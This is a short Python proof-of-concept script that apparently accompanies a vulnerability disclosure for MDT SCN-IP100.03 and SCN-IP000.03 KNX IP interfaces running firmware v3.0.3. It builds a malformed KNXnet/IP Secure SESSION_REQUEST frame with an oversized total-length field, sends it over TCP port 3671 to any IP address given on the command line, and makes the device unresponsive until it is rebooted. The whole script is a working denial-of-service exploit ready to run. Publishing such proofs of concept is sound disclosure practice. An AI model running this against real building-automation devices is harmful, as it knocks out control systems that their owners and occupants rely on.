# MIT License # # Copyright (c) 2021 Robert Gützkow # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. import socket import argparse def denial_of_service(target_ip): ''' Proof of concept for a denial of service vulnerability in firmware v3.0.3 of MDT SCN-IP100.03 and SCN-IP000.03. Sending a SESSION_REQUEST frame with the total length field set to a value of 0x0259 or higher will cause a vulnerable target device to become unresponsive to all KNXnet/IP Secure frames until the device is rebooted. :param target_ip: IP address of the target device ''' port = 3671 payload = bytearray([ # KNX IP header 0x06, # Header length (1 byte) 0x10, # Protocol version (1 byte) 0x09, # Service type identifier for SESSION_REQUEST (2 bytes) 0x51, 0x02, # Total length (2 bytes) 0x59, # Incorrectly set to value larger than the expected constant length 0x2e (46 bytes) # HPAI control endpoint 0x08, # Structure length (1 byte) 0x02, # Host protocol code for TCP (1 byte) 0x00, # IPv4 address for client's control endpoint (4 bytes) set all zero for route back 0x00, 0x00, 0x00, 0x00, # Port number (2 bytes) set to all zero for route back 0x00 ]) payload.extend(bytes([0x00] * 32)) # Diffie-Hellman client public value X (32 bytes) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target_ip, port)) s.sendall(payload) s.close() if __name__ == "__main__": parser = argparse.ArgumentParser(description="PoC for DoS vulnerability in SCN-IP100.03 firmware v3.0.3") parser.add_argument("-t", "--target", type=str, help="IP address of the target device", required=True) args = parser.parse_args() denial_of_service(args.target)